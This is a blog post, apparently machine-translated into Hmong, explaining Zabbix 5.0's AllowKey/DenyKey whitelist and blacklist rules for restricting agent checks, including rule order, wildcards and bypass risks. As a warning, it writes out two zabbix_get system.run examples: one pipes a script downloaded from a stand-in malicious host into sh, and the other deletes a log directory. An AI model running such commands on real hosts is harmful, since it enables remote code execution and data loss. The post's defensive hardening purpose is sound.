ProHoster > Π‘Π»ΠΎΠ³ > Kev tswj hwm > Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas

Tikhon Uskov, Integration Engineer, Zabbix

Cov teeb meem kev ruaj ntseg cov ntaub ntawv

Zabbix 5.0 muaj qhov tshiab uas tso cai rau koj los txhim kho kev ruaj ntseg hauv cov tshuab siv Zabbix Agent thiab hloov qhov qub tsis Qhib RemoteCommands.

Kev txhim kho hauv kev ruaj ntseg ntawm tus neeg sawv cev-raws li cov kab ke tshwm sim los ntawm qhov tseeb tias tus neeg sawv cev tuaj yeem ua tau ntau yam kev ua phem.

  • Tus neeg sawv cev tuaj yeem sau yuav luag txhua yam ntaub ntawv, suav nrog cov ntaub ntawv tsis pub lwm tus paub lossis muaj peev xwm txaus ntshai, los ntawm cov ntaub ntawv teeb tsa, cov ntaub ntawv teev npe, cov ntaub ntawv password, lossis lwm yam ntaub ntawv.

Piv txwv li, siv zabbix_get utility koj tuaj yeem nkag mus rau cov npe ntawm cov neeg siv, lawv cov npe hauv tsev, cov ntaub ntawv lo lus zais, thiab lwm yam.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Nkag mus rau cov ntaub ntawv siv zabbix_get utility

CEEB TOOM. Cov ntaub ntawv tsuas tuaj yeem muab tau yog tias tus neeg sawv cev tau nyeem cov ntawv tso cai ntawm cov ntaub ntawv sib xws. Tab sis, piv txwv li, cov ntaub ntawv /etc/passwd/ nyeem tau los ntawm txhua tus neeg siv.

  • Tus neeg sawv cev kuj tuaj yeem ua cov lus txib uas txaus ntshai. Piv txwv li, qhov tseem ceeb *system.run[]** tso cai rau koj los ua cov lus txib tej thaj chaw deb ntawm lub network nodes, suav nrog kev khiav cov ntawv sau los ntawm Zabbix web interface uas tseem ua cov lus txib ntawm tus neeg sawv cev sab. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Ntawm Linux, tus neeg sawv cev khiav los ntawm lub neej ntawd yam tsis muaj cov cai hauv paus, thaum nyob rau Windows nws khiav raws li kev pabcuam raws li System thiab muaj kev txwv tsis pub nkag mus rau cov ntaub ntawv kaw lus. Raws li, yog tias tsis muaj kev hloov pauv rau Zabbix Agent tsis tau tom qab kev teeb tsa, tus neeg sawv cev tau nkag mus rau lub npe, cov ntaub ntawv kaw lus thiab tuaj yeem ua tiav WMI cov lus nug.

Nyob rau hauv ua ntej versions lub parameter EnableRemoteCommands=0 tso cai tsuas yog lov tes taw metrics nrog tus yuam sij *system.run[]** thiab khiav cov ntawv sau los ntawm lub vev xaib interface, tab sis tsis muaj txoj hauv kev los txwv tsis pub nkag mus rau ib tus neeg cov ntaub ntawv, tso cai lossis lov tes taw ib tus yuam sij uas tau teeb tsa nrog tus neeg sawv cev, lossis txwv kev siv tus kheej tsis txwv.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Siv lub EnableRemoteCommand parameter nyob rau hauv ua ntej versions ntawm Zabbix

AllowKey/DenyKey

Zabbix 5.0 pab tiv thaiv kev nkag mus tsis tau tso cai los ntawm kev muab cov npe dawb thiab cov npe dub rau kev tso cai thiab tsis lees paub qhov ntsuas ntawm tus neeg sawv cev sab.

Hauv Zabbix 5.0 txhua tus yuam sij, suav nrog *system.run[]** tau qhib, thiab ob txoj kev xaiv tus neeg sawv cev tshiab tau ntxiv:

AllowKey = - tso cai kuaj;

DenyKey = - txwv tsis pub kuaj;

qhov twg yog tus qauv lub npe tseem ceeb nrog cov ntsuas uas siv metacharacters (*).

Cov yuam sij AllowKey thiab DenyKey tso cai rau koj tso cai lossis tsis lees paub tus kheej ntsuas raws li tus qauv tshwj xeeb. Tsis zoo li lwm yam kev teeb tsa, tus naj npawb ntawm AllowKey / DenyKey tsis txwv. Qhov no tso cai rau koj kom paub meej tias tus neeg sawv cev tuaj yeem ua dab tsi hauv qhov system los ntawm kev tsim cov ntoo ntawm cov tshev - cov yuam sij ua tiav, qhov kev txiav txim uas lawv tau sau ua lub luag haujlwm tseem ceeb heev.

Kev ua raws cai

Cov cai raug kuaj xyuas hauv qhov kev txiav txim uas lawv tau nkag mus rau hauv cov ntaub ntawv teeb tsa. Tus yuam sij raug kuaj xyuas raws li cov cai ua ntej thawj qhov kev sib tw, thiab sai li sai tau thaum tus yuam sij ntawm cov ntaub ntawv sib tw nrog tus qauv, nws raug tso cai lossis tsis kam lees. Tom qab no, txoj cai tshuaj xyuas nres thiab cov yuam sij ntxiv tsis quav ntsej.

Yog li ntawd, yog tias lub ntsiab lus sib phim ob qho tib si ib qho kev tso cai thiab tsis lees paub txoj cai, qhov tshwm sim yuav nyob ntawm seb txoj cai twg yog thawj zaug hauv cov ntaub ntawv teeb tsa.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

2 txoj cai sib txawv nrog tib tus qauv thiab tus yuam sij vfs.file.size[/tmp/file]

Qhov kev txiav txim ntawm kev siv cov yuam sij AllowKey / DenyKey:

  1. raws nraim txoj cai,
  2. kev cai dav dav,
  3. txwv tsis pub.

Piv txwv li, yog tias koj xav tau kev nkag mus rau cov ntaub ntawv hauv ib lub nplaub tshev, koj yuav tsum xub tso cai nkag mus rau lawv, thiab tom qab ntawd tsis lees paub txhua yam uas tsis poob rau hauv kev tso cai tsim. Yog tias txoj cai tsis kam lees siv ua ntej, kev nkag mus rau lub nplaub tshev yuav raug tsis lees paub.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Yog ib ntus

Yog tias koj xav tau tso cai 2 cov khoom siv hluav taws xob khiav ntawm *system.run[]**, thiab txoj cai tsis kam lees yuav raug teev tseg ua ntej, cov khoom siv hluav taws xob yuav tsis raug tso tawm, vim tias thawj tus qauv yuav yeej ib txwm phim txhua tus yuam sij, thiab cov cai tom ntej yuav raug tsis quav ntsej.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Kev tsis raug

Qauv

Cov kev cai yooj yim

Pattern yog ib qho kev qhia nrog wildcards. Tus metacharacter (*) sib phim ib tus lej ntawm cov cim ntawm ib txoj haujlwm tshwj xeeb. Metacharacters tuaj yeem siv ob qho tib si hauv lub npe tseem ceeb thiab hauv qhov ntsuas. Piv txwv li, koj tuaj yeem nruj me ntsis txhais thawj qhov ntsuas nrog cov ntawv nyeem, thiab qhia tus tom ntej no li wildcard.

Parameters yuav tsum tau muab ntim rau hauv square brackets [].

  • system.run[* - tsis ncaj ncees lawm
  • vfs.file*.txt] - tsis ncaj ncees lawm
  • vfs.file.*[*] - txoj cai

Piv txwv ntawm kev siv wildcard.

  1. Nyob rau hauv lub npe tseem ceeb thiab nyob rau hauv lub parameter. Hauv qhov no, tus yuam sij tsis sib haum rau tus yuam sij zoo sib xws uas tsis muaj qhov ntsuas, txij li hauv cov qauv peb tau qhia tias peb xav kom tau txais qee qhov xaus ntawm lub npe tseem ceeb thiab qee qhov kev txwv.
  2. Yog tias tus qauv tsis siv cov square brackets, tus qauv tso cai rau txhua tus yuam sij uas tsis muaj qhov ntsuas thiab tsis lees paub txhua tus yuam sij uas muaj qhov ntsuas qhov ntsuas.
  3. Yog hais tias tus yuam sij tau sau tag nrho thiab cov tsis tau teev tseg raws li wildcard, nws yuav phim cov yuam sij zoo sib xws nrog cov kev txwv thiab yuav tsis phim tus yuam sij yam tsis muaj square brackets, piv txwv li nws yuav raug tso cai lossis tsis kam lees.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Cov cai rau sau cov parameter.

  • Yog hais tias tus yuam sij nrog cov kev txwv yog npaj los siv, cov kev txwv yuav tsum tau teev nyob rau hauv cov ntaub ntawv teeb tsa. Parameters yuav tsum tau teev raws li ib tug metacharacter. Nws yog ib qho tsim nyog yuav tsum ua tib zoo tsis kam lees nkag mus rau ib qho ntaub ntawv thiab coj mus rau hauv tus account dab tsi cov ntaub ntawv ntsuas tuaj yeem muab tau raws li kev sau sib txawv - nrog thiab tsis muaj qhov ntsuas.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Nta ntawm kev sau cov yuam sij nrog cov ntsuas

  • Yog hais tias tus yuam sij tau teev nrog cov tsis muaj, tab sis qhov tsis yog xaiv tau thiab teev raws li tus lej metacharacter, tus yuam sij tsis muaj qhov yuav raug daws. Piv txwv li, yog tias koj xav lov tes taw tau txais cov ntaub ntawv hais txog kev thauj khoom ntawm CPU thiab qhia meej tias qhov system.cpu.load[*] tus yuam sij yuav tsum tau ua tsis taus, tsis txhob hnov ​​​​qab tias tus yuam sij tsis muaj qhov ntsuas yuav rov qab tus nqi nruab nrab.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Cov cai rau kev sau rau hauv parameter

Sau ntawv

hloov

  • Qee cov kev cai tsis tuaj yeem hloov pauv los ntawm tus neeg siv, piv txwv li, kev tshawb pom cov cai lossis tus neeg saib xyuas kev sau npe pib. AllowKey/DenyKey cov cai tsis cuam tshuam rau cov kev txwv hauv qab no:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

CEEB TOOM. Yog tias tus thawj coj ua haujlwm tsis siv tus yuam sij, thaum nug, Zabbix tsis muab cov ntaub ntawv hais txog vim li cas cov metric lossis tus yuam sij poob rau hauv qeb 'TSIS TXAUS SIAB'. Cov ntaub ntawv hais txog kev txwv ntawm kev ua cov lus txib tej thaj chaw deb kuj tsis tshwm nyob rau hauv cov ntaub ntawv teev tus neeg sawv cev. Qhov no yog vim muaj kev ruaj ntseg, tab sis tuaj yeem cuam tshuam kev debugging yog tias kev ntsuas poob rau hauv ib pawg tsis txhawb nqa rau qee qhov laj thawj.

  • Koj yuav tsum tsis txhob cia siab rau ib qho kev txiav txim tshwj xeeb rau kev sib txuas cov ntaub ntawv teeb tsa sab nraud (piv txwv li, hauv cov ntawv sau).

Command Line Utilities

Tom qab teeb tsa cov cai, koj yuav tsum xyuas kom meej tias txhua yam raug teeb tsa kom raug.

Koj tuaj yeem siv ib qho ntawm peb txoj kev xaiv:

  • Ntxiv ib qho metric rau Zabbix.
  • Kuaj nrog zabbix_agentd. Zabbix tus neeg sawv cev nrog kev xaiv - luam ntawv (-p) qhia tag nrho cov yuam sij (uas tau tso cai los ntawm lub neej ntawd) tshwj tsis yog cov uas tsis tso cai los ntawm kev teeb tsa. Thiab nrog kev xaiv -test (-t) rau tus yuam sij txwv yuav rov qab 'Unsupported yam khoom tseem ceeb'.
  • Kuaj nrog zabbix_get. Kev siv hluav taws xob zabbix_get nrog kev xaiv -k yuav rov qab 'ZBX_NOTSUPPORTED: Tsis paub metric'.

Tso cai los tsis kam

Koj tuaj yeem tsis lees txais kev nkag mus rau cov ntaub ntawv thiab txheeb xyuas, piv txwv li, siv cov khoom siv hluav taws xob zabbix_getuas nkag mus rau cov ntaub ntawv yog tsis kam.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

**

CEEB TOOM. Quotes nyob rau hauv parameter yog ignored.

Hauv qhov no, kev nkag mus rau cov ntaub ntawv zoo li no tuaj yeem tso cai los ntawm txoj kev sib txawv. Piv txwv li, yog tias symlink coj mus rau nws.

Blacklist thiab whitelist txhawb rau tus neeg saib xyuas-sab ntsuas hauv Zabbix 5.0

Nws raug nquahu kom kuaj xyuas ntau yam kev xaiv rau kev siv cov kev cai teev tseg, thiab tseem yuav tsum coj mus rau hauv tus account qhov muaj peev xwm ntawm kev hla cov kev txwv.

Yog muaj lus nug thiab lus teb

Koj lo lus nug. Vim li cas cov qauv zoo li no nrog nws cov lus xaiv los piav txog cov cai, kev tso cai thiab kev txwv? Vim li cas nws thiaj tsis tuaj yeem siv, piv txwv li, cov kab lus tsis tu ncua uas Zabbix siv?

Teb. Qhov no yog qhov teeb meem kev ua haujlwm regex vim tias feem ntau tsuas yog ib tus neeg sawv cev thiab nws kuaj xyuas ntau tus lej ntsuas. Regex yog qhov ua haujlwm hnyav heev thiab peb tsis tuaj yeem kuaj ntau txhiab tus ntsuas li no. Wildcards - ib tug universal, dav siv thiab yooj yim daws.

Koj lo lus nug. Puas tsis suav nrog cov ntaub ntawv suav nrog hauv cov ntawv sau?

Teb. Raws li kuv paub, nws zoo li tsis tuaj yeem kwv yees qhov kev txiav txim uas yuav siv tau yog tias koj kis cov cai hla cov ntaub ntawv sib txawv. Kuv pom zoo kom sau tag nrho AllowKey / DenyKey cov cai hauv ib qho suav nrog cov ntaub ntawv, vim tias lawv cuam tshuam nrog ib leeg, thiab suav nrog cov ntaub ntawv no.

Koj lo lus nug. Hauv Zabbix 5.0 qhov kev xaiv 'EnableRemoteCommands =' ploj ntawm cov ntaub ntawv teeb tsa, thiab tsuas yog AllowKey / DenyKey muaj?

Teb. Yog lawm.

Ua tsaug rau koj txoj kev paub!

Tau qhov twg los: www.hab.com

Ntxiv ib saib